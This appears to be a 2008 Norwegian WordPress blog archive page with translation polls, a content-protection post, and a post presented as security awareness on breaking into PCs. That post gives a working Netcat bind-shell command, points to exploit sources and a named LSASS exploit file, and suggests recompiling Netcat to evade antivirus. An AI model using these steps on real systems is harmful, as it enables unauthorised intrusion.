Ny oppdatert språkfil kan lastes ned fra denne siden. Det er noen nye ord i oversettelsen. Etter avstemming på plugin og widget ble ordene for disse henholdsvis innstikk og widget. Andre ord som har fått mer eller mindre merkelig oversettelse er: Fortsett å lese ‘Norsk oversettelse av WP 2.5′
Månedarkiv for mars, 2008
Jeg fikk god hjelp av Kristin imens vi venter, og nå er det bare et par ord igjen som er vanskelige. Her kan du være med å bestemme hva ordene skal bli i den norske oversettelsen av WordPress 2.5.
Hva er det norske ordet for plugin?
- innstikk (49%, 31 stemmer)
- utvidelse (33%, 21 stemmer)
- plugin (18%, 11 stemmer)
Antall stemmer: 63
Loading ...Kan du finne på et ord for widget på norsk?
Dette blir for vanskelig til å komme med alternativer. Forslag ønskes i kommentarfeltet.
Oppdatering:
Hva er det norske ordet for widget?
- widget (54%, 25 stemmer)
- innretning (24%, 11 stemmer)
- duppeditt (22%, 10 stemmer)
Antall stemmer: 46
Loading ...Jeg lurer på hvilke vilkår hos MSN reporter som er brutt. Innlegget mitt om hvordan man kan bryte seg inn i en PC ble tydeligvis for sterk kost, for nå har saken plutselig blitt ikke aktiv. Tror de at sensur kan føre til mindre oppmerksomhet om problemet? Er det lurt å ikke være åpne om sikkerhet?
Her er en oppskift på hvordan man kan gjøre innbrudd i andre datamaskiner på nett. Siden jeg vil holde meg innenfor lovens rammer vil jeg bryte meg inn hos meg selv. Denne teksten publiseres for å vise hvor enkelt det er, og for å opplyse om metoder som brukes -så man kan beskytte seg. Det tas ingen ansvar for feil og ulovlig bruk av informasjon i dette innlegget.
En bakdør
I dette første og enkle eksempelet vil jeg bruke Netcat som bakdør. Den er fleksibel og kan gjøre det meste. Netcat er et lite kommandolinjeprogram som ofte kalles bare nc. For å illustrere hva den er god for er den første setningen i manualsiden beskrivende: nc – TCP/IP swiss army knife.
Litt hypotetisk: Tenk om to PC’er er på ett nett. Den ene har IP adresse 192.168.0.2 og heter abc og den andre heter xyz. På PC abc kjører vi denne kommandoen:
user@abc~:$ nc -l -p 2000 -e /bin/sh
Da skal vi ha mekket en åpen port som venter på at vi kobler oss til. Når man kobler til port 2000 skal programmet sh kjøres. Om man vil gjøre noe lignende på en Windows maskin kan man feks kjøre programmet cmd.exe. Sånn kobler vi oss til fra PC xyz og tar en titt:
guest@xyz:~$ nc 192.168.0.2 2000 pwd /home/user ls Desktop Documents Examples Music Pictures Public Templates Videos
Kommandoene som ble gitt fra PC xyz etter tilkobling var pwd som viser gjeldene mappe i filsystemet man er i på PC abc, og ls viser filene og mappene på den plassen. Hvis man bare får lurt PC abc til å kjøre kommandoen den fikk i eksempelet kan man dermed få kontroll fra en annen PC. Nå burde litt forståelse for grunnleggende muligheter være på plass.
Utnytte ett sikkerhetshull
Jeg har tidligere skrevet om hvordan man kan finne sikkerhetshull på andre datamaskiner. For å putte inn en bakdør og ta kontroll over en annen PC må man først finne en svakhet. Her er ett eksempel på hvordan ett sikkerhetshull kan bli rapportert i en bit av Nessus Scan Report:
Vulnerability microsoft-ds (445/tcp)
Synopsis :
Arbitrary code can be executed on the remote host due to a flaw in the LSASS service.Description :
The remote version of Windows contains a flaw in the function DsRolerUpgradeDownlevelServer of the Local Security Authority server Service (LSASS) which may allow an attacker to execute arbitrary code on the remote host with the SYSTEM privileges.A series of worms (Sasser) are known to exploit this vulnerability in the wild.
Solution :
Microsoft has released a set of patches for Windows NT, 2000, XP and 2003 :http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Risk factor :
Critical / CVSS Base Score : 10
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)
CVE : CVE-2003-0533
BID : 10108
Other references : IAVA:2004-A-0006, OSVDB:5248
Nessus ID : 12209
Når man har funnet et sikkerhetshull kan man bruke feks Google til å lete etter metoder for å utnytte dette. Ved å bruke ordet exploit isammen med detaljer om ett detektert sikkerhetshull som søkeord finner man antagelig noe interessant. Enda mer interessante resultater kan man få ved å søke i listen over kjente exploit’s hos milw0rm (alle nødendige tekniske detaljer om dem ligger der). Nettstedene SecurityFocus, Digital Information Society og Hack In The Box har forøvrig masse informasjon om sikkerhetshull og utnyttelse av dem.
Hvis man er skikkelig hard-core (og kanskje har testet seg frem til ett sikkerhetshull som ikke andre har oppdaget enda) så kan man undersøke hva som skjer i RAM på PC’en med sikkerhetshullet. Sånn kan man analysere seg frem til hvordan man kan få ett program inn i hullet og få det til å kjøre.
Installere en bakdør
En del antivirusprogram oppdager Netcat, påstår at det er en bakdør og tar det bort. Selv om det finnes mange legitime grunner til å bruke programmet. Jeg bruker det nesten daglig i jobbsammenheng. For å komme rundt antivirusprogrammene kan det være nødvendig å hente kildekoden og kompilere en egen modifisert versjon (feks med kommandolinje-parameterene man vil bruke skrevet inn i kildekoden). Netcat er ett fleksibelt og lite program å lure inn i ett sikkerhetshull.
Hullet i Nessus eksempelet over hadde en enkel måte å installere bakdør på. Ved å kompilere hod-ms04011-lsasrv-expl.c og kjøre det med nødvendige kommandolinjeparametere er PC’en i den andre enden klar for å bli tilkoblet. Eksempler på hvordan finner du i filen som kan kompileres. Og ja, jeg testet at dette virker mot min egen PC -men nå er oppdatering på plass.
Andre metoder for angrep
Det å vise ett TIF bilde med Internet Explorer kan være farlig. Ihvertfall om bildet er tuklet med og PC’en som viser det ikke har aktuell oppdatering. Programmet for å lage ett bilde som kjører calc.exe ved å vise det er tilgjengelig for alle. Og programmet kan endres til å kjøre noe mindre uskyldig. Kanskje det ligger mange sånne bilder rundt omkring på Internett.
Nye virus oppdages hver dag. Mange av disse installerer en bakdør i PC’en som infiseres. For å nevne noen gamle eksempler så installerer virusene Mydoom og Sobig en bakdør i tillegg til å spre seg videre og gjøre ugang. Når mange PC’er gjør koordinert ugang samtidig kan det bli ubehagelig for feks både Microsoft og DOD.
Ajax og Web 2.0 er betegnelser på mer interaktiv web. Lekre greier. Det er til og med sånt her. Både klient (nettleseren din) og server (PC’en med denne bloggen) kan være utsatt. Ny teknologi som nesten plutselig sprer seg ut til massene kan bringe uante muligheter.
Hvordan beskytte seg
Man kan gjøre mye, men jeg synes det enkleste og viktigste er:
- Bruk en brannmur. En egen hardware boks (feks innebygget i en router) er fornuftig, men sånn software på hver PC bør også brukes.
- Ikke ha flere åpninger inn i systemet enn nødvendig. Med andre ord: steng alle porter som du ikke må ha åpne i brannmuren.
- Hold programvare som kommuniserer over nett oppdaterte. Automatiske oppdateringer bør med andre ord være på.
- Bruk ett antivirusprogram eller feks Ubuntu for ikke å ødelegge for deg selv. Automatisk oppdatering for deteksjon av nye virus bør være på.
- Hvis du bruker trådløst nettverk, så sørg for å bruke skikkelig kryptering. Spesielt interesserte kan lese om naboene mine og hvorfor WEP ikke er godt nok.
Terskelen for å komme inn i en datamaskin er relativt stor. Når man først har fått tilgang kan man gjøre det meste. Det å få slettet eller ødelagt informasjon eller programmer er langt i fra det værst mulige resultatet av et innbrudd. Kanskje er heller ikke det at andre kopierer data fra deg så farlig. En PC med en installert bakdør kan brukes til videre innbrudd eller distribuerte angrep på andre datamaskiner på nett. De mest utspekulerte cracker‘ene gjør gjerne akkurat det.
Er du trygg da?
Store endringer i software fører til at det innføres feil. Uansett hvor godt man tester. Til og med i software til fly. Det er tross alt bare mennesker som lager software, og det er en sammenheng mellom antall nye linjer med kode, hvor grundig ting blir testet og antall feil.
WordPress kommer snart ut med en ny stor oppdatering. Mange linjer kode er endret. Sannsynligheten for at den inneholder sikkerhetskritiske feil (inkludert sånne som ikke blir funnet av utviklerene og rettet) regner jeg som betydelig. Det bør være naturlig å spørre seg: er det lurt å oppdatere med en gang ny versjon dukker opp?
En egen hardware-boks med brannmur i er langt i fra alt du trenger av beskyttelse. Det skulle ikke forundre meg mye om feks MCF5223x familien av mikrokontrollere bor i noen sånne bokser. Utviklerene av software for den mikrokontrolleren tar sannsynligvis utgangspunkt i software fra produsenten. Den er smekkfull av sikkerhetshull og feil. Jeg gjorde ett forsøk på å hjelpe produsenten med noen av feilene (Eric som kommenterer på det innlegget jobber for produsenten) -men fikk ikke lov på grunn av brudd på lisensen med en underleverandør.
Windows Vista har helt ny software for TCP/IP. Det er litt av hvert som har med sikkerhet å gjøre i den, som sikkert er fint og flott. Men det hadde vært veldig rart om noe så komplekst er uten feil. Hvis man absolutt vil finne en sårbarhet som ikke er oppdaget enda er det nok bare å mekke en web-server som tuller med lavnivå protokoll-ting og putter inn mest mulig ulogiske verdier og sekvenser i de forskjellige feltene.
Spørsmål?
Tror du det var lurt å gå til denne siden med nettleseren din? Var det noe du lurte på? Spør i kommentarfeltet da vel.
Jeg har innført noen tiltak for å hindre at andre stjeler mitt innhold. Andre kan også ha nytte av dette. Derfor har jeg samlet litt relevant informasjon i dette innlegget, med fokus på det tekniske.
Hotlinking
Noen er så frekke at de kopierer bilder fra der det passer dem. De som er ekstra frekke lenker til dine bilder fra sin egen side (det kalles hotlinking eller inline linking), og stjeler dermed også båndbredde fra deg. Dette kan stoppes med feks Hotlink protection plugin for WordPress. Jeg bruker det, og viser nå frem dette bildet på sidene til noen av de som er ekstra frekke:
Se også innlegget til Martin om samme tema, men med andre løsninger.
Frames
En del steder på nett har ikke kapasitet til å lage skikkelig innhold selv, men ønsker likevel å generere trafikk for å feks tjene penger på reklame. Noen av dem er sleipe nok til å putte andres innhold inn i en boks på egen side. Sånn fremstilles det litt som noe de har lagd selv. Denne snutten en plass imellom <head> og </head> stopper sleipingene:
<script type="text/javascript">
<!--
if (parent.frames.length > 0) { parent.location.href = location.href; }
-->
</script>
Hvis man har en WordPress (ikke WordPress.com) blogg og ikke ønsker å redigere temafiler, kan man bruke feks Break out of frames innstikket for å putte inn den nødvendige snutten over.
Indeksering
Denne teksten imellom <head> og </head> stopper de aller fleste robotene, hvis man ønsker at noe ikke skal være søkbart andre steder:
<meta name="robots" content="noindex">
Noe lignende kan gjøres med robots.txt filen. Det er en tekst-fil som forteller robotene hvordan de skal forholde seg til sidene dine. For å få samme resultat som meta-dingsen over kan man knatte inn dette i filen:
User-agent: *
Disallow: /
…og legge den på toppnivå for domenet ditt. Med den filen kan man også begrense tilgang mer spesifikt. Feks sånn som jeg har gjort:
User-agent: ia_archiver Disallow: / User-agent: BlogSpy Disallow: / User-agent: Googlebot-Image Disallow: / User-agent: yahoo-mmcrawler Disallow:/ User-agent: psbot Disallow:/ User-agent: * Disallow: /fotoalbum/ Disallow: /wp-admin/ Disallow: /wp-content/uploads/
Kort forklart er det fem roboter som ikke får indeksere (lagre sidene) hos meg, og noen områder og filtyper liker jeg ikke at noen roboter indekserer. Hadde det bare vært så enkelt som Kristin drømmer om *sukk*.
Begrenset feed
Dette har Undre skrevet utmerket om, så jeg ser ikke noe behov for å komme med noen tilføyelser.
Oppdatering om feed
Undre skriver godt om metodene som kan brukes for å begrense feed. Det finnes en del sider rundt omkring som bare baserer seg på innhold fra andre. Noen av dem kopierer feed mer eller mindre ukritisk fra der de finnes. Dermed kan det være fornuftig å ha begrenset feed, gjerne merket med copyright på hvert innlegg (feks med enten ©Feed eller Simple Feed Copyright innstikkene). Det kan også være en ide å tenke godt igjennom hvor man ping’er innleggene.
Passord
Å stenge robotene helt ute med passord er effektivt. Til og med leserene blir borte. I ett forsøk på å forenkle det å få passord lagde jeg ett WordPress innstikk som sender det på e-post (men det kan brukes til å sende andre ting også). Innstikket mitt kan kombineres med feks global post password innstikket for å unngå forskjellige passord på innlegg i bloggen.
E-post
Litt sånn på sidelinjen av dette temaet, men fordi det virker som om mange ikke tenker seg om…
Det å legge ut e-post adressen din uten beskyttelse på web er ikke noen god ide. Da blir fort innboksen full av søppel. Hvis du ønsker å gi leserene mulighet til å sende deg en e-post kan det gjøres med feks contact form 7 (jeg bruker min egen norske oversettelse til det innstikket) eller wp contact form III hos Kristin.
En annen måte å gjøre seg tilgjengelig på e-post er å legge ut adressen med feks innstikket obfuscate e-mail. Eller rett og slett skrive den inn i ett bilde, og vri og vrenge litt på den (gjerne putte på litt farger også) så det blir vanskelig for OCR-programvare å lese.
Opphavsrett
Oppdatert: Les om Opphavsrett på Internett på denne bloggen. Er det noen der ute (med juridisk kompetanse?) som kunne ha skrevet litt om opphavsrett i forbindelse med blogger og RSS-feed’er? LorelleKopinor kan være interessante kilder til informasjon.
Spørsmål
Har jeg glemt noe? Er det noe som kan gjøres enklere? Var det noe du ikke forstod? Har du beskyttet deg?